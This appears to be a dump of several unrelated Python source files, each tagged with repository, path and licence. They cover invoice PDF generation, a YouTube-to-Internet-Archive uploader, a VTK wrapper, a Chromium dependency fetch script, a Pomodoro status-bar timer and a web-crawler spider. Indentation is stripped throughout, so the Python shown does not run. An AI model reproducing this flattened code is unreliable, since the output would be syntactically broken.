invoice_settings = InvoiceSettings.objects.settings()
vat_settings = VatSettings.objects.settings()
for tr in time_records:
contact = invoice.contact
invoice_contact = InvoiceContact.objects.get(contact=contact)
invoice_line = InvoiceLine(
user=user,
invoice=invoice,
line_number=invoice.get_next_line_number(),
product=invoice_settings.time_record_product,
quantity=tr.invoice_quantity,
price=invoice_contact.hourly_rate,
units='hours',
vat_code=vat_settings.standard_vat_code,
)
invoice_line.save()
# link time record to invoice line
tr.invoice_line = invoice_line
tr.save()
def _is_valid(self, contact, time_records, raise_exception=None):
result = []
# check the invoice settings are set-up
invoice_settings = InvoiceSettings.objects.settings()
if not invoice_settings.time_record_product:
result.append(
"Cannot create an invoice. The invoice settings need a "
"product selected to use for time records."
)
# check the VAT settings are set-up
VatSettings.objects.settings()
invoice_contact = InvoiceContact.objects.get(contact=contact)
if not invoice_contact.hourly_rate:
result.append(
"Cannot create invoice - no hourly rate for "
"'{}'".format(contact.slug)
)
#if not time_records.count():
# result.append("Cannot create invoice. There are no time records.")
for tr in time_records:
if not tr.is_complete:
result.append(
"Cannot create invoice. Time record '{}' does "
"not have a start date/time or end time.".format(tr)
)
break
if result and raise_exception:
raise InvoiceError(
', '.join(result)
)
else:
return result
def create(self, user, contact, iteration_end):
""" Create invoices from time records """
invoice = None
time_records = TimeRecord.objects.to_invoice(contact, iteration_end)
self._is_valid(contact, time_records, raise_exception=True)
with transaction.atomic():
if time_records.count():
next_number = Invoice.objects.next_number()
invoice = Invoice(
number=next_number,
invoice_date=date.today(),
contact=contact,
user=user,
)
invoice.save()
self._add_time_records(user, invoice, time_records)
return invoice
def draft(self, contact, iteration_end):
"""Return a queryset with time records selected to invoice"""
return TimeRecord.objects.to_invoice(contact, iteration_end)
def is_valid(self, contact, raise_exception=None):
iteration_end = date.today()
time_records = TimeRecord.objects.to_invoice(contact, iteration_end)
return self._is_valid(contact, time_records, raise_exception)
def refresh(self, user, invoice, iteration_end):
"""Add invoice lines to a previously created (draft) invoice."""
if not invoice.is_draft:
raise InvoiceError(
"Time records can only be added to a draft invoice."
)
time_records = TimeRecord.objects.to_invoice(
invoice.contact,
iteration_end,
)
self._is_valid(invoice.contact, time_records, raise_exception=True)
with transaction.atomic():
self._add_time_records(user, invoice, time_records)
return invoice
class InvoiceCreateBatch(object):
def create(self, user, iteration_end):
""" Create invoices from time records """
invoice_create = InvoiceCreate()
model = apps.get_model(settings.CONTACT_MODEL)
for contact in model.objects.all():
invoice_create.create(user, contact, iteration_end)
class InvoicePrint(MyReport):
"""
Write a PDF for an invoice which has already been created in the database.
"""
def _get_column_styles(self, column_widths):
# style - add vertical grid lines
style = []
for idx in range(len(column_widths) - 1):
style.append((
'LINEAFTER',
(idx, 0),
(idx, -1),
self.GRID_LINE_WIDTH,
colors.gray)
)
return style
def create_pdf(self, invoice, header_image):
self.is_valid(invoice, raise_exception=True)
# Create the document template
buff = io.BytesIO()
doc = platypus.SimpleDocTemplate(
buff,
title=invoice.description,
pagesize=A4
)
invoice_settings = InvoiceSettings.objects.settings()
vat_settings = VatSettings.objects.settings()
# Container for the 'Flowable' objects
elements = []
elements.append(
self._table_header(
invoice,
invoice_settings,
vat_settings,
header_image
)
)
elements.append(platypus.Spacer(1, 12))
elements.append(self._table_lines(invoice))
elements.append(self._table_totals(invoice))
for text in self._text_footer(invoice_settings.footer):
elements.append(self._para(text))
# write the document to disk
doc.build(elements, canvasmaker=NumberedCanvas)
pdf = buff.getvalue()
buff.close()
invoice_filename = '{}.pdf'.format(invoice.invoice_number)
invoice.pdf.save(invoice_filename, ContentFile(pdf))
return invoice_filename
def is_valid(self, invoice, raise_exception=None):
result = []
if not invoice.has_lines:
result.append(
"Invoice {} has no lines - cannot create "
"PDF".format(invoice.invoice_number)
)
if not invoice.is_draft:
result.append(
"Invoice {} is not a draft invoice - cannot "
"create a PDF".format(invoice.invoice_number)
)
is_credit = invoice.is_credit
for line in invoice.invoiceline_set.all():
if not line.is_credit == is_credit:
if is_credit:
result.append(
"All credit note lines must have a negative quantity."
)
else:
result.append(
"All invoice lines must have a positive quantity."
)
break
if result and raise_exception:
raise InvoiceError(
', '.join(result)
)
else:
return result
def _table_invoice_detail(self, invoice):
"""
Create a (mini) table containing the invoice date and number.
This is returned as a 'mini table' which is inserted into the main
header table to keep headings and data aligned.
"""
# invoice header
invoice_header_data = [
[
self._bold('Date'),
'%s' % invoice.invoice_date.strftime('%d/%m/%Y')
],
[
self._bold(invoice.description),
'%s' % invoice.invoice_number
],
]
return platypus.Table(
invoice_header_data,
colWidths=[70, 200],
style=[
#('GRID', (0, 0), (-1, -1), self.GRID_LINE_WIDTH, colors.grey),
('VALIGN', (0, 0), (-1, -1), 'TOP'),
('LEFTPADDING', (0, 0), (-1, -1), 0),
]
)
def _table_header(
self, invoice, invoice_settings, vat_settings, header_image):
"""
Create a table for the top section of the invoice (before the project
description and invoice detail)
"""
left = []
right = []
# left hand content
left.append(self._para(self._text_invoice_address(invoice)))
left.append(platypus.Spacer(1, 12))
left.append(self._table_invoice_detail(invoice))
# right hand content
if header_image:
right.append(self._image(header_image))
right.append(self._para(
self._text_our_address(invoice_settings.name_and_address)
))
right.append(self._bold(invoice_settings.phone_number))
if vat_settings.vat_number:
right.append(self._para(
self._text_our_vat_number(vat_settings.vat_number)
))
heading = [platypus.Paragraph(invoice.description, self.head_1)]
# If the invoice has a logo, then the layout is different
if header_image:
data = [
[
heading + left, # left
right, # right
],
]
else:
data = [
[
heading, # left (row one)
[], # right (row one)
],
[
left, # left (row two)
right, # right (row two)
],
]
return platypus.Table(
data,
colWidths=[300, 140],
style=[
('VALIGN', (0, 0), (-1, -1), 'TOP'),
('LEFTPADDING', (0, 0), (-1, -1), 0),
#('GRID', (0, 0), (-1, -1), self.GRID_LINE_WIDTH, colors.grey),
]
)
def _table_lines(self, invoice):
""" Create a table for the invoice lines """
# invoice line header
data = [[
None,
self._para('Description'),
'Net',
'%VAT',
'VAT',
'Gross',
]]
# lines
lines = self._get_invoice_lines(invoice)
# initial styles
style = [
#('BOX', (0, 0), (-1, -1), self.GRID_LINE_WIDTH, colors.gray),
('LINEABOVE', (0, 0), (-1, 0), self.GRID_LINE_WIDTH, colors.gray),
('VALIGN', (0, 0), (0, -1), 'TOP'),
('ALIGN', (2, 0), (-1, -1), 'RIGHT'),
]
# style - add horizontal grid lines
for idx, line in enumerate(lines):
row_number = line[0]
if not row_number:
style.append((
'LINEBELOW',
(0, idx),
(-1, idx),
self.GRID_LINE_WIDTH,
colors.gray)
)
# column widths
column_widths = [30, 220, 50, 40, 50, 50]
style = style + self._get_column_styles(column_widths)
# draw the table
return platypus.Table(
data + lines,
colWidths=column_widths,
repeatRows=1,
style=style,
)
def _table_totals(self, invoice):
""" Create a table for the invoice totals """
gross = invoice.gross
net = invoice.net
vat = invoice.gross - invoice.net
data = [[
self._bold('Totals'),
'%.2f' % net,
None,
'%.2f' % vat,
'%.2f' % gross,
]]
style = [
('ALIGN', (1, 0), (-1, -1), 'RIGHT'),
('LINEBELOW', (0, 0), (-1, 0), self.GRID_LINE_WIDTH, colors.gray),
('LINEABOVE', (0, 0), (-1, 0), 1, colors.black),
]
column_widths = [250, 50, 40, 50, 50]
style = style + self._get_column_styles(column_widths)
return platypus.Table(
data,
colWidths=column_widths,
style=style,
)
def _get_invoice_line_description(self, invoice_line):
result = []
if invoice_line.description:
result.append('{}'.format(invoice_line.description))
if invoice_line.has_time_record:
time_record = invoice_line.timerecord
if time_record.title:
result.append('{}'.format(time_record.title))
result.append('%s %s to %s' % (
time_record.date_started.strftime("%a %d %b %Y"),
time_record.start_time.strftime("from %H:%M"),
time_record.end_time.strftime("%H:%M"),
))
result.append('%.2f %s @ %s pounds' % (
invoice_line.quantity,
invoice_line.units,
invoice_line.price
))
return '<br />'.join(result)
def _get_invoice_lines(self, invoice):
data = []
ticket_pk = None
for line in invoice.invoiceline_set.all():
# ticket heading (do not repeat)
if line.has_time_record and ticket_pk != line.timerecord.ticket.pk:
ticket_pk = line.timerecord.ticket.pk
data.append([
None,
self._bold(line.timerecord.ticket.title),
None,
None,
None,
None,
])
data.append([
'%s' % line.line_number,
self._para(self._get_invoice_line_description(line)),
'%.2f' % line.net,
'{:g}'.format(self._round(line.vat_rate * Decimal('100'))),
'%.2f' % line.vat,
'%.2f' % (line.vat + line.net),
])
return data
def _text_footer(self, footer):
""" Build a list of text to go in the footer """
result = []
lines = footer.split('\n')
for text in lines:
result.append(text)
return tuple(result)
def _text_invoice_address(self, invoice):
""" Name and address of contact we are invoicing """
contact = invoice.contact
lines = []
lines += [contact.company_name] if contact.company_name else []
lines += [contact.address_1] if contact.address_1 else []
lines += [contact.address_2] if contact.address_2 else []
lines += [contact.address_3] if contact.address_3 else []
lines += [contact.town] if contact.town else []
lines += [contact.county] if contact.county else []
lines += [contact.postcode] if contact.postcode else []
lines += [contact.country] if contact.country else []
return '<br />'.join(lines)
def _text_our_address(self, name_and_address):
""" Company name and address """
lines = name_and_address.split('\n')
return '<br />'.join(lines)
def _text_our_vat_number(self, vat_number):
return '<b>VAT Number</b> {}'.format(vat_number)
| pkimber/invoice | invoice/service.py | Python | apache-2.0 | 16,089 |
import os
import sys
import re
import glob
import time
import json
import logging
import internetarchive
from internetarchive.config import parse_config_file
from datetime import datetime
from yt_dlp import YoutubeDL
from .utils import (sanitize_identifier, check_is_file_empty,
EMPTY_ANNOTATION_FILE)
from logging import getLogger
from urllib.parse import urlparse
from tubeup import __version__
DOWNLOAD_DIR_NAME = 'downloads'
class TubeUp(object):
def __init__(self,
verbose=False,
dir_path='~/.tubeup',
ia_config_path=None,
output_template=None):
"""
`tubeup` is a tool to archive YouTube by downloading the videos and
uploading it back to the archive.org.
:param verbose: A boolean, True means all loggings will be
printed out to stdout.
:param dir_path: A path to directory that will be used for
saving the downloaded resources. Default to
'~/.tubeup'.
:param ia_config_path: Path to an internetarchive config file, will
be used in uploading the file.
"""
self.dir_path = dir_path
self.verbose = verbose
self.ia_config_path = ia_config_path
self.logger = getLogger(__name__)
if output_template is None:
self.output_template = '%(id)s.%(ext)s'
else:
self.output_template = output_template
# Just print errors in quiet mode
if not self.verbose:
self.logger.setLevel(logging.ERROR)
@property
def dir_path(self):
return self._dir_path
@dir_path.setter
def dir_path(self, dir_path):
"""
Set a directory to be the saving directory for resources that have
been downloaded.
:param dir_path: Path to a directory that will be used to save the
videos, if it not created yet, the directory
will be created.
"""
extended_usr_dir_path = os.path.expanduser(dir_path)
# Create the directories.
os.makedirs(
os.path.join(extended_usr_dir_path, DOWNLOAD_DIR_NAME),
exist_ok=True)
self._dir_path = {
'root': extended_usr_dir_path,
'downloads': os.path.join(extended_usr_dir_path,
DOWNLOAD_DIR_NAME)
}
def get_resource_basenames(self, urls,
cookie_file=None, proxy_url=None,
ydl_username=None, ydl_password=None,
use_download_archive=False):
"""
Get resource basenames from an url.
:param urls: A list of urls that will be downloaded with
youtubedl.
:param cookie_file: A cookie file for YoutubeDL.
:param proxy_url: A proxy url for YoutubeDL.
:param ydl_username: Username that will be used to download the
resources with youtube_dl.
:param ydl_password: Password of the related username, will be used
to download the resources with youtube_dl.
:param use_download_archive: Record the video url to the download archive.
This will download only videos not listed in
the archive file. Record the IDs of all
downloaded videos in it.
:return: Set of videos basename that has been downloaded.
"""
downloaded_files_basename = set()
def ydl_progress_hook(d):
if d['status'] == 'downloading' and self.verbose:
if d.get('_total_bytes_str') is not None:
msg_template = ('%(_percent_str)s of %(_total_bytes_str)s '
'at %(_speed_str)s ETA %(_eta_str)s')
elif d.get('_total_bytes_estimate_str') is not None:
msg_template = ('%(_percent_str)s of '
'~%(_total_bytes_estimate_str)s at '
'%(_speed_str)s ETA %(_eta_str)s')
elif d.get('_downloaded_bytes_str') is not None:
if d.get('_elapsed_str'):
msg_template = ('%(_downloaded_bytes_str)s at '
'%(_speed_str)s (%(_elapsed_str)s)')
else:
msg_template = ('%(_downloaded_bytes_str)s '
'at %(_speed_str)s')
else:
msg_template = ('%(_percent_str)s % at '
'%(_speed_str)s ETA %(_eta_str)s')
process_msg = '\r[download] ' + (msg_template % d) + '\033[K'
sys.stdout.write(process_msg)
sys.stdout.flush()
if d['status'] == 'finished':
msg = 'Downloaded %s' % d['filename']
self.logger.debug(d)
self.logger.info(msg)
if self.verbose:
print('\n%s' % d)
print(msg)
if d['status'] == 'error':
# TODO: Complete the error message
msg = 'Error when downloading the video'
self.logger.error(msg)
if self.verbose:
print(msg)
ydl_opts = self.generate_ydl_options(ydl_progress_hook,
cookie_file, proxy_url,
ydl_username, ydl_password,
use_download_archive)
with YoutubeDL(ydl_opts) as ydl:
for url in urls:
# Get the info dict of the url, it also download the resources
# if necessary.
info_dict = ydl.extract_info(url)
downloaded_files_basename.update(
self.create_basenames_from_ydl_info_dict(ydl, info_dict)
)
self.logger.debug(
'Basenames obtained from url (%s): %s'
% (url, downloaded_files_basename))
return downloaded_files_basename
def create_basenames_from_ydl_info_dict(self, ydl, info_dict):
"""
Create basenames from YoutubeDL info_dict.
:param ydl: A `youtube_dl.YoutubeDL` instance.
:param info_dict: A ydl info_dict that will be used to create
the basenames.
:return: A set that contains basenames that created from
the `info_dict`.
"""
info_type = info_dict.get('_type', 'video')
self.logger.debug('Creating basenames from ydl info dict with type %s'
% info_type)
filenames = set()
if info_type == 'playlist':
# Iterate and get the filenames through the playlist
for video in info_dict['entries']:
filenames.add(ydl.prepare_filename(video))
else:
filenames.add(ydl.prepare_filename(info_dict))
basenames = set()
for filename in filenames:
filename_without_ext = os.path.splitext(filename)[0]
file_basename = re.sub(r'(\.f\d+)', '', filename_without_ext)
basenames.add(file_basename)
return basenames
def generate_ydl_options(self,
ydl_progress_hook,
cookie_file=None,
proxy_url=None,
ydl_username=None,
ydl_password=None,
use_download_archive=False,
ydl_output_template=None):
"""
Generate a dictionary that contains options that will be used
by youtube_dl.
:param ydl_progress_hook: A function that will be called during the
download process by youtube_dl.
:param proxy_url: A proxy url for YoutubeDL.
:param ydl_username: Username that will be used to download the
resources with youtube_dl.
:param ydl_password: Password of the related username, will be
used to download the resources with
youtube_dl.
:param use_download_archive: Record the video url to the download archive.
This will download only videos not listed in
the archive file. Record the IDs of all
downloaded videos in it.
:return: A dictionary that contains options that will
be used by youtube_dl.
"""
ydl_opts = {
'outtmpl': os.path.join(self.dir_path['downloads'],
self.output_template),
'restrictfilenames': True,
'quiet': not self.verbose,
'verbose': self.verbose,
'progress_with_newline': True,
'forcetitle': True,
'continuedl': True,
'retries': 9001,
'fragment_retries': 9001,
'forcejson': False,
'writeinfojson': True,
'writedescription': True,
'writethumbnail': True,
'writeannotations': True,
'writesubtitles': True,
'allsubtitles': True,
'ignoreerrors': True, # Geo-blocked,
# copyrighted/private/deleted
# will be printed to STDOUT and channel
# ripping will continue uninterupted,
# use with verbose off
'fixup': 'warn', # Slightly more verbosity for debugging
# problems
'nooverwrites': True, # Don't touch what's already been
# downloaded speeds things
'consoletitle': True, # Download percentage in console title
'prefer_ffmpeg': True, # `ffmpeg` is better than `avconv`,
# let's prefer it's use
# Warns on out of date youtube-dl script, helps debugging for
# youtube-dl devs
'call_home': False,
'logger': self.logger,
'progress_hooks': [ydl_progress_hook]
}
if cookie_file is not None:
ydl_opts['cookiefile'] = cookie_file
if proxy_url is not None:
ydl_opts['proxy'] = proxy_url
if ydl_username is not None:
ydl_opts['username'] = ydl_username
if ydl_password is not None:
ydl_opts['password'] = ydl_password
if use_download_archive:
ydl_opts['download_archive'] = os.path.join(self.dir_path['root'],
'.ytdlarchive')
return ydl_opts
def upload_ia(self, videobasename, custom_meta=None):
"""
Upload video to archive.org.
:param videobasename: A video base name.
:param custom_meta: A custom meta, will be used by internetarchive
library when uploading to archive.org.
:return: A tuple containing item name and metadata used
when uploading to archive.org.
"""
json_metadata_filepath = videobasename + '.info.json'
with open(json_metadata_filepath) as f:
vid_meta = json.load(f)
itemname = ('%s-%s' % (vid_meta['extractor'],
vid_meta['display_id']))
# Exit if video download did not complete, don't upload .part files to IA
if glob.glob(videobasename + '*.part'):
msg = 'Video download incomplete, re-attempt archival attempt, exiting...'
raise Exception(msg)
# Replace illegal characters within identifer
itemname = sanitize_identifier(itemname)
metadata = self.create_archive_org_metadata_from_youtubedl_meta(
vid_meta)
# Delete empty description file
description_file_path = videobasename + '.description'
if (os.path.exists(description_file_path) and
(('description' in vid_meta and
vid_meta['description'] == '') or
check_is_file_empty(description_file_path))):
os.remove(description_file_path)
# Delete empty annotations.xml file so it isn't uploaded
annotations_file_path = videobasename + '.annotations.xml'
if (os.path.exists(annotations_file_path) and
(('annotations' in vid_meta and
vid_meta['annotations'] in {'', EMPTY_ANNOTATION_FILE}) or
check_is_file_empty(annotations_file_path))):
os.remove(annotations_file_path)
# Upload all files with videobase name: e.g. video.mp4,
# video.info.json, video.srt, etc.
files_to_upload = glob.glob(videobasename + '*')
# Upload the item to the Internet Archive
item = internetarchive.get_item(itemname)
if custom_meta:
metadata.update(custom_meta)
# Parse internetarchive configuration file.
parsed_ia_s3_config = parse_config_file(self.ia_config_path)[1]['s3']
s3_access_key = parsed_ia_s3_config['access']
s3_secret_key = parsed_ia_s3_config['secret']
if None in {s3_access_key, s3_secret_key}:
msg = ('`internetarchive` configuration file is not configured'
' properly.')
self.logger.error(msg)
if self.verbose:
print(msg)
raise Exception(msg)
item.upload(files_to_upload, metadata=metadata, retries=9001,
request_kwargs=dict(timeout=9001), delete=True,
verbose=self.verbose, access_key=s3_access_key,
secret_key=s3_secret_key)
return itemname, metadata
def archive_urls(self, urls, custom_meta=None,
cookie_file=None, proxy=None,
ydl_username=None, ydl_password=None,
use_download_archive=False):
"""
Download and upload videos from youtube_dl supported sites to
archive.org
:param urls: List of url that will be downloaded and uploaded
to archive.org
:param custom_meta: A custom metadata that will be used when
uploading the file with archive.org.
:param cookie_file: A cookie file for YoutubeDL.
:param proxy_url: A proxy url for YoutubeDL.
:param ydl_username: Username that will be used to download the
resources with youtube_dl.
:param ydl_password: Password of the related username, will be used
to download the resources with youtube_dl.
:param use_download_archive: Record the video url to the download archive.
This will download only videos not listed in
the archive file. Record the IDs of all
downloaded videos in it.
:return: Tuple containing identifier and metadata of the
file that has been uploaded to archive.org.
"""
downloaded_file_basenames = self.get_resource_basenames(
urls, cookie_file, proxy, ydl_username, ydl_password, use_download_archive)
for basename in downloaded_file_basenames:
identifier, meta = self.upload_ia(basename, custom_meta)
yield identifier, meta
@staticmethod
def determine_collection_type(url):
"""
Determine collection type for an url.
:param url: URL that the collection type will be determined.
:return: String, name of a collection.
"""
if urlparse(url).netloc == 'soundcloud.com':
return 'opensource_audio'
return 'opensource_movies'
@staticmethod
def determine_licenseurl(vid_meta):
"""
Determine licenseurl for an url
:param vid_meta:
:return:
"""
licenseurl = ''
licenses = {
"Creative Commons Attribution license (reuse allowed)": "https://creativecommons.org/licenses/by/3.0/",
"Attribution-NonCommercial-ShareAlike": "https://creativecommons.org/licenses/by-nc-sa/2.0/",
"Attribution-NonCommercial": "https://creativecommons.org/licenses/by-nc/2.0/",
"Attribution-NonCommercial-NoDerivs": "https://creativecommons.org/licenses/by-nc-nd/2.0/",
"Attribution": "https://creativecommons.org/licenses/by/2.0/",
"Attribution-ShareAlike": "https://creativecommons.org/licenses/by-sa/2.0/",
"Attribution-NoDerivs": "https://creativecommons.org/licenses/by-nd/2.0/"
}
if 'license' in vid_meta and vid_meta['license']:
licenseurl = licenses.get(vid_meta['license'])
return licenseurl
@staticmethod
def create_archive_org_metadata_from_youtubedl_meta(vid_meta):
"""
Create an archive.org from youtubedl-generated metadata.
:param vid_meta: A dict containing youtubedl-generated metadata.
:return: A dict containing metadata to be used by
internetarchive library.
"""
title = '%s' % (vid_meta['title'])
videourl = vid_meta['webpage_url']
collection = TubeUp.determine_collection_type(videourl)
# Some video services don't tell you the uploader,
# use our program's name in that case.
try:
if vid_meta['extractor_key'] == 'TwitchClips' and 'creator' in vid_meta and vid_meta['creator']:
uploader = vid_meta['creator']
elif 'uploader' in vid_meta and vid_meta['uploader']:
uploader = vid_meta['uploader']
elif 'uploader_url' in vid_meta and vid_meta['uploader_url']:
uploader = vid_meta['uploader_url']
else:
uploader = 'tubeup.py'
except TypeError: # apparently uploader is null as well
uploader = 'tubeup.py'
uploader_url = vid_meta.get('uploader_url', videourl)
try: # some videos don't give an upload date
d = datetime.strptime(vid_meta['upload_date'], '%Y%m%d')
upload_date = d.isoformat().split('T')[0]
upload_year = upload_date[:4] # 20150614 -> 2015
except (KeyError, TypeError):
# Use current date and time as default values
upload_date = time.strftime("%Y-%m-%d")
upload_year = time.strftime("%Y")
# load up tags into an IA compatible semicolon-separated string
# example: Youtube;video;
tags_string = '%s;video;' % vid_meta['extractor_key']
if 'categories' in vid_meta:
# add categories as tags as well, if they exist
try:
for category in vid_meta['categories']:
tags_string += '%s;' % category
except Exception:
print("No categories found.")
if 'tags' in vid_meta: # some video services don't have tags
try:
if 'tags' in vid_meta is None:
tags_string += '%s;' % vid_meta['id']
tags_string += '%s;' % 'video'
else:
for tag in vid_meta['tags']:
tags_string += '%s;' % tag
except Exception:
print("Unable to process tags successfully.")
# license
licenseurl = TubeUp.determine_licenseurl(vid_meta)
# if there is no description don't upload the empty .description file
description_text = vid_meta.get('description', '')
if description_text is None:
description_text = ''
# archive.org does not display raw newlines
description_text = re.sub('\r?\n', '<br>', description_text)
description = ('{0} <br/><br/>Source: <a href="{1}">{2}</a>'
'<br/>Uploader: <a href="{3}">{4}</a>').format(
description_text, videourl, videourl, uploader_url, uploader)
metadata = dict(
mediatype=('audio' if collection == 'opensource_audio'
else 'movies'),
creator=uploader,
collection=collection,
title=title,
description=description,
date=upload_date,
year=upload_year,
subject=tags_string,
originalurl=videourl,
licenseurl=licenseurl,
# Set 'scanner' metadata pair to allow tracking of TubeUp
# powered uploads, per request from archive.org
scanner='TubeUp Video Stream Mirroring Application {}'.format(__version__))
return metadata
| bibanon/tubeup | tubeup/TubeUp.py | Python | gpl-3.0 | 21,687 |
# class generated by DeVIDE::createDeVIDEModuleFromVTKObject
from module_kits.vtk_kit.mixins import SimpleVTKClassModuleBase
import vtk
class vtkMultiGroupProbeFilter(SimpleVTKClassModuleBase):
def __init__(self, module_manager):
SimpleVTKClassModuleBase.__init__(
self, module_manager,
vtk.vtkMultiGroupProbeFilter(), 'Processing.',
('vtkDataSet', 'vtkDataObject'), ('vtkDataSet',),
replaceDoc=True,
inputFunctions=None, outputFunctions=None)
| nagyistoce/devide | modules/vtk_basic/vtkMultiGroupProbeFilter.py | Python | bsd-3-clause | 517 |
from ._plntll_ec import EcuaciónEdad
class FuncDías(EcuaciónEdad):
"""
Edad por día.
"""
nombre = 'Días'
def eval(símismo, paso, sim):
return paso
| julienmalard/Tikon | tikon/móds/rae/orgs/ecs/edad/días.py | Python | agpl-3.0 | 184 |
#!/usr/bin/env python
# Copyright 2021 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# This is generated, do not edit. Update BuildConfigGenerator.groovy and
# 3ppFetch.template instead.
from __future__ import print_function
import argparse
import json
import os
_FILE_URL = 'https://dl.google.com/dl/android/maven2/com/google/android/datatransport/transport-api/2.2.1/transport-api-2.2.1.aar'
_FILE_NAME = 'transport-api-2.2.1.aar'
_FILE_VERSION = '2.2.1'
def do_latest():
print(_FILE_VERSION)
def get_download_url(version):
if _FILE_URL.endswith('.jar'):
ext = '.jar'
elif _FILE_URL.endswith('.aar'):
ext = '.aar'
else:
raise Exception('Unsupported extension for %s' % _FILE_URL)
partial_manifest = {
'url': [_FILE_URL],
'name': [_FILE_NAME],
'ext': ext,
}
print(json.dumps(partial_manifest))
def main():
ap = argparse.ArgumentParser()
sub = ap.add_subparsers()
latest = sub.add_parser("latest")
latest.set_defaults(func=lambda _opts: do_latest())
download = sub.add_parser("get_url")
download.set_defaults(
func=lambda _opts: get_download_url(os.environ['_3PP_VERSION']))
opts = ap.parse_args()
opts.func(opts)
if __name__ == '__main__':
main()
| nwjs/chromium.src | third_party/android_deps/libs/com_google_android_datatransport_transport_api/3pp/fetch.py | Python | bsd-3-clause | 1,383 |
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^result', views.result, name='result'),
url(r'^$', views.index, name='index'),
]
| mosmeh/danbooru-prediction | prediction/urls.py | Python | mit | 165 |
import socket
try:
import requests
httplib2 = None
except ImportError:
requests = None
try:
import httplib2
except ImportError:
raise ImportError('No module named requests or httplib2')
ConnectionError = requests.exceptions.ConnectionError if requests else socket.error
def wrap_http_connection(http_connection=None):
if not http_connection:
http_connection = requests.Session() if requests else httplib2.Http()
if not is_requests_instance(http_connection):
http_connection = RequestWrapper(http_connection)
return http_connection
def is_requests_instance(obj):
return hasattr(obj, 'get') and hasattr(obj, 'post')
class RequestWrapper(object):
"""
Wraps an `httplib2` instance to make it behave enough like a
`requests` instance for our purposes
"""
def __init__(self, conn):
self.conn = conn
def request(self, method, url, data=None, headers=None):
response, content = self.conn.request(url, method=method, body=data, headers=headers)
return ResponseWrapper(response, content)
class ResponseWrapper(object):
"""
Wraps an `httplib2` response pair to make it behave enough like a
`requests` response object for our purposes
"""
def __init__(self, response, content):
self.status_code = response.status
self.content = content
| tow/sunburnt | sunburnt/http.py | Python | mit | 1,389 |
import subprocess
from datetime import datetime, timedelta
from i3pystatus import IntervalModule
from i3pystatus.core.desktop import DesktopNotification
STOPPED = 0
RUNNING = 1
BREAK = 2
class Pomodoro(IntervalModule):
"""
This plugin shows Pomodoro timer.
Left click starts/restarts timer.
Right click stops it.
Example color settings.
.. code-block:: python
color_map = {
'stopped': '#2ECCFA',
'running': '#FFFF00',
'break': '#37FF00'
}
"""
settings = (
('sound',
'Path to sound file to play as alarm. Played by "aplay" utility'),
('pomodoro_duration',
'Working (pomodoro) interval duration in seconds'),
('break_duration', 'Short break duration in seconds'),
('long_break_duration', 'Long break duration in seconds'),
('short_break_count', 'Short break count before first long break'),
('format', 'format string, available formatters: current_pomodoro, '
'total_pomodoro, time'),
('inactive_format', 'format string to display when no timer is running'),
('color', 'dictionary containing a mapping of statuses to colours')
)
inactive_format = 'Start Pomodoro'
color_map = {
'stopped': '#2ECCFA',
'running': '#FFFF00',
'break': '#37FF00'
}
color = None
sound = None
interval = 1
short_break_count = 3
format = '☯ {current_pomodoro}/{total_pomodoro} {time}'
pomodoro_duration = 25 * 60
break_duration = 5 * 60
long_break_duration = 15 * 60
on_rightclick = "stop"
on_leftclick = "start"
def init(self):
# state could be either running/break or stopped
self.state = STOPPED
self.current_pomodoro = 0
self.total_pomodoro = self.short_break_count + 1 # and 1 long break
self.time = None
if self.color is not None and type(self.color) == dict:
self.color_map.update(self.color)
def run(self):
if self.time and datetime.utcnow() >= self.time:
if self.state == RUNNING:
self.state = BREAK
if self.current_pomodoro == self.short_break_count:
self.time = datetime.utcnow() + \
timedelta(seconds=self.long_break_duration)
else:
self.time = datetime.utcnow() + \
timedelta(seconds=self.break_duration)
text = 'Go for a break!'
else:
self.state = RUNNING
self.time = datetime.utcnow() + \
timedelta(seconds=self.pomodoro_duration)
text = 'Back to work!'
self.current_pomodoro = (self.current_pomodoro + 1) % self.total_pomodoro
self._alarm(text)
if self.state == RUNNING or self.state == BREAK:
min, sec = divmod((self.time - datetime.utcnow()).total_seconds(), 60)
text = '{:02}:{:02}'.format(int(min), int(sec))
sdict = {
'time': text,
'current_pomodoro': self.current_pomodoro + 1,
'total_pomodoro': self.total_pomodoro
}
color = self.color_map['running'] if self.state == RUNNING else self.color_map['break']
text = self.format.format(**sdict)
else:
text = self.inactive_format
color = self.color_map['stopped']
self.output = {
'full_text': text,
'color': color
}
def start(self):
self.state = RUNNING
self.time = datetime.utcnow() + timedelta(seconds=self.pomodoro_duration)
self.current_pomodoro = 0
def stop(self):
self.state = STOPPED
self.time = None
def _alarm(self, text):
notification = DesktopNotification(title='Alarm!', body=text)
notification.display()
if self.sound is not None:
subprocess.Popen(['aplay',
self.sound,
'-q'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
| facetoe/i3pystatus | i3pystatus/pomodoro.py | Python | mit | 4,203 |
import re
import abc
import asyncio
import contextlib
import urllib.parse as urlparse
import aiohttp
import pyquery
from pycrawl.utils import Queue
from pycrawl.http import Request
from pycrawl.http import Response
from pycrawl.middleware import CrawlerMiddlewareManager
class Spider(metaclass=abc.ABCMeta):
def __init__(self, middlewares=None, loop=None, **config):
self.config = config
self._context = {}
self._loop = loop or asyncio.get_event_loop()
self._connector = aiohttp.TCPConnector(loop=self._loop)
self._middlewares = CrawlerMiddlewareManager(self, middlewares)
def enqueue_request(self, **kwargs):
context = self._context[self.task]
max_depth = self.config.get('max_depth')
if max_depth and context['request'].depth > max_depth:
return
request = Request(referer=context['response'], **kwargs)
if request.url in self._seen:
return
if not self._url_allowed(request):
return
request.depth = context['response'].request.depth + 1
self._queue.put_nowait(request)
def _url_allowed(self, request):
return next(
(
True for domain in self.config['domains']
if request.furl.host.endswith(domain)
),
False,
)
@asyncio.coroutine
def start(self):
self._seen = set()
self._queue = Queue(loop=self._loop)
for url in self.config['urls']:
self._queue.put_nowait(Request(url))
workers = [asyncio.Task(self._work()) for _ in range(self.config['concurrency'])]
yield from self._queue.join()
for worker in workers:
worker.cancel()
@asyncio.coroutine
def _work(self):
while True:
request = yield from self._queue.get()
yield from self._fetch(request)
self._queue.task_done()
@asyncio.coroutine
def _fetch(self, request):
for callback in self._middlewares['before_request']:
request = callback(request)
resp = yield from aiohttp.request('GET', request.url, loop=self._loop)
body = yield from resp.read_and_close()
response = Response(request, resp, body)
for callback in self._middlewares['after_response']:
response = callback(response)
with self._request_context(self._loop, request, response):
self.parse(response)
@property
def _task(self):
